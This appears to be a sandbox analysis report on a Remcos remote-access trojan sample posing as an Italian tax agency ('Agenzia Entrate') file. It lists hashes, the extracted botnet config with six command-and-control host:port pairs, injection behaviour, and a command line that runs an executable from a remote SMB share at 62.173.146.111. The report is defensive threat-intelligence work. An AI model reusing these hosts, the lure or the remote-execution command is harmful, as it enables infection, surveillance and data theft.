remcos | 2289f5e6c2e87cf4265ed7d05ef739d726ebd82614a1b856d4b5964834d307c9

General

Target

Direzione.url
Size

206B
MD5

6547426d8875ea1864bee6479a6a8fee
SHA1

6e27d0989f5c45a07a9dddaabcc3dcdbe5338d0a
SHA256

e3454a40e1903c9369f74b323df4dda0931449a0321cd3ae21f3e8d0ff92b93c
SHA512

b50af831ffcaebbd43db8f127148d8f70ec8e2909b064e1a9ec1683c42ea98ddf93bb0eaf10e8c42ebf94b343e08cc0919dd6a1eb33943aa9cd19e64e9b2b279

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

listpoints.online:6090

retghrtgwtrgtg.bounceme.net:3839

listpoints.click:7020

datastream.myvnc.com:5225

gservicese.com:2718

center.onthewifi.com:8118

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
explorer.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-BXAQVH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Agenzia_Entrate_2023.exe

description	pid	Process	procid_target
PID 644 created 1660	644	Agenzia_Entrate_2023.exe	30

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 1 IoCs

Processes:

liveupdate.exe

pid	Process
3532	liveupdate.exe

Loads dropped DLL 1 IoCs

Processes:

liveupdate.exe

pid	Process
3532	liveupdate.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

liveupdate.exe

description	pid	Process	procid_target
PID 3532 set thread context of 2676	3532	liveupdate.exe	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

Agenzia_Entrate_2023.exeliveupdate.execmd.exe

pid	Process
644	Agenzia_Entrate_2023.exe
644	Agenzia_Entrate_2023.exe
644	Agenzia_Entrate_2023.exe
3532	liveupdate.exe
3532	liveupdate.exe
2676	cmd.exe
2676	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

liveupdate.execmd.exe

pid	Process
3532	liveupdate.exe
2676	cmd.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

rundll32.exeAgenzia_Entrate_2023.exeliveupdate.execmd.exe

description	pid	Process	procid_target
PID 1660 wrote to memory of 644	1660	rundll32.exe	97
PID 1660 wrote to memory of 644	1660	rundll32.exe	97
PID 1660 wrote to memory of 644	1660	rundll32.exe	97
PID 644 wrote to memory of 3532	644	Agenzia_Entrate_2023.exe	102
PID 644 wrote to memory of 3532	644	Agenzia_Entrate_2023.exe	102
PID 644 wrote to memory of 3532	644	Agenzia_Entrate_2023.exe	102
PID 3532 wrote to memory of 2676	3532	liveupdate.exe	103
PID 3532 wrote to memory of 2676	3532	liveupdate.exe	103
PID 3532 wrote to memory of 2676	3532	liveupdate.exe	103
PID 3532 wrote to memory of 2676	3532	liveupdate.exe	103
PID 2676 wrote to memory of 4844	2676	cmd.exe	111
PID 2676 wrote to memory of 4844	2676	cmd.exe	111
PID 2676 wrote to memory of 4844	2676	cmd.exe	111
PID 2676 wrote to memory of 4844	2676	cmd.exe	111

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Direzione.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1660
- \??\UNC\62.173.146.111\scarica\Agenzia_Entrate_2023.exe
  "\\62.173.146.111\scarica\Agenzia_Entrate_2023.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:644
- C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      4⤵
      PID:4844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1f5398bd

Filesize
1.1MB

MD5
fee80e5cdbc6c6067d1ae0e7809a0574

SHA1
0cf3173c4796e899ddf6036a344412b86a7b7ebb

SHA256
5ae70a16f2a161b02aa3b524f662fef038b8874fb94a818c844a31b0b9801ae7

SHA512
5de20c8b4cc2f5a4a0390b8db153078e0f65625fa091f92e6e03476fdde0001ea41f685a8bbd18a11cfcbce89a175001eced408c1e9f6eb45a07b7f33b039ec6

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\jouk.mpg

Filesize
1.0MB

MD5
4d91a20aa4d22ae69a4ea79f87174247

SHA1
74a240121fd831e4dfa657d38f31c4ae28ade8cf

SHA256
9c7007e3001feb3b3a3f1fed787fb03f2bc3a45b334d12e8cb118c1c4552e3e5

SHA512
eaf39b4253ed4f0e0dcd9130472b5fe4dfca2e45ea33cd9a4ea55824940ddf88fd882eab70d0543f951684b953611bba059b71a2ed076ed965fd24fe845bff79

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe

Filesize
485KB

MD5
6bf3b86782b7911b76029737162ae206

SHA1
1b8009865c79b5674734ba4ce9a6905bed78182e

SHA256
535f67c47f811aa5b421904959dd6931396a52cdbb9ddb69bface741356dbbef

SHA512
385291ef2ba36b39fd6c7c5af08ad9127d60685e28d69e55152341f522b79f2f4ca3c1aa9e13575dbce0699d976b34dbb5985d08495ca22dc20ed323b7d80ba1

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe

Filesize
485KB

MD5
6bf3b86782b7911b76029737162ae206

SHA1
1b8009865c79b5674734ba4ce9a6905bed78182e

SHA256
535f67c47f811aa5b421904959dd6931396a52cdbb9ddb69bface741356dbbef

SHA512
385291ef2ba36b39fd6c7c5af08ad9127d60685e28d69e55152341f522b79f2f4ca3c1aa9e13575dbce0699d976b34dbb5985d08495ca22dc20ed323b7d80ba1

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\log.dll

Filesize
101KB

MD5
e63883e03a5b030dcd4d4c4688c0fa59

SHA1
2fe9e4a94acb104b4a7acf29d1110653849efdec

SHA256
d9c661c6799daafd2dead8aca1c69e383999de94f18e0ef23f7b2787d56b5ed0

SHA512
828e3a10caf960b080391b6c2efee6591b903c5561a9e4e513af284de283b0f21a10935e168f287856e7cd6be5373f421491ec672341201a1f3d3ccdc98a4bf6

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\log.dll

Filesize
101KB

MD5
e63883e03a5b030dcd4d4c4688c0fa59

SHA1
2fe9e4a94acb104b4a7acf29d1110653849efdec

SHA256
d9c661c6799daafd2dead8aca1c69e383999de94f18e0ef23f7b2787d56b5ed0

SHA512
828e3a10caf960b080391b6c2efee6591b903c5561a9e4e513af284de283b0f21a10935e168f287856e7cd6be5373f421491ec672341201a1f3d3ccdc98a4bf6

Download Submit
memory/644-11-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/644-15-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/644-12-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/644-9-0x00007FF94F2F0000-0x00007FF94F4E5000-memory.dmp

Filesize
2.0MB

Download
memory/644-18-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/644-28-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/644-7-0x0000000003A40000-0x0000000003A50000-memory.dmp

Filesize
64KB

Download
memory/644-8-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/2676-33-0x00007FF94F2F0000-0x00007FF94F4E5000-memory.dmp

Filesize
2.0MB

Download
memory/2676-38-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/2676-36-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/2676-35-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/2676-31-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/3532-29-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/3532-27-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/3532-26-0x00007FF94F2F0000-0x00007FF94F4E5000-memory.dmp

Filesize
2.0MB

Download
memory/3532-25-0x0000000073C30000-0x0000000073DAB000-memory.dmp

Filesize
1.5MB

Download
memory/4844-39-0x00007FF94F2F0000-0x00007FF94F4E5000-memory.dmp

Filesize
2.0MB

Download
memory/4844-40-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-42-0x0000000000DE0000-0x0000000001213000-memory.dmp

Filesize
4.2MB

Download
memory/4844-43-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-44-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-45-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-46-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-47-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-48-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-49-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-50-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4844-51-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads